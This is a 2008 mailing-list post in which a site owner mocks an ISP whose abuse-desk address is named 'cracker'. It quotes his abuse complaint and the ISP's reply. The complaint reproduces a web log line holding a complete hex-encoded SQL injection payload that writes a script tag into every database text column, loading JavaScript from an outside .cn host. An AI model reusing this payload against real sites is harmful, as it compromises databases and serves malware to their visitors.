[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Infiltration of ISP providers by crackers.

So ...(sigh) what do you do when you complain to a given ISP provider about
a case of attempted abuse by one of their IP addresses and you get a
response from someone in the "security team" whose email name is "cracker?"

Apparently some (or many) of these crackers own (with their consent or not)
even their ISP providers --or worse, some (or many) ISP providers may be
crackers themselves!

A portion of my original complaint to the ISP --where I list one of the
attempted abuse records by the cracker for informational purposes:

from myself <my_emai_address> tonetwork-adm hinet net,
network-center hinet net
dateMon, Aug 25, 2008 at 11:37 PM subjectAbuse by user at IP address mailed-bymy_domain

On August 25, 2008, from 08:52:10  am to 08:52:28 am (America/Tijuana time),
user at IP address abused <my> web site with the below
referenced offending code (relevant web server log section is attached and
named as abuse-118_167_20_180.txt). - - [25/Aug/2008:08:52:10 -0700] "GET
xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20 S
%20CHAR(4000);SET%20 S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Foxy/1; Foxy/1; .NET CLR 1.1.4322)"


I would appreciate your cooperation in stopping this sort of cracker

Thank you in advance for your prompt attention to this issue.

---------------End of portion of email

Below is an Interesting section of one of the replies:


Return-Path: <my_email_address>
Received: from localhost (localhost [])
        by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
        for <cracker localhost>; Tue, 26 Aug 2008 18:06:31 +0800

----------End of unformatted

The above was attached to the formated email reply below:


from cracker hinet net to<my_email_address>
dateTue, Aug 26, 2008 at 4:24 AM subject[HiNetSOC/Craker : 1219749049]HiNet
Notification(HiNet 通知) mailed-bylcss.hinet.net
hide details 4:24 AM (11 hours ago)

Dear Sir:

 Thank you for your email. Please kindly provide us more detail information
about the bad behavior at least including the attackers' IP address, time
(GMT, Greenwich Mean Time) and evidence for further processing.
- Hide quoted text -

Yours sincerely,

HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker hinet net


------End of formatted email

No wonder spam and intrusion attempts never end.

Jose R R

IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
and SuSE; official Ubuntu support coming at the end of August 2008.

[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]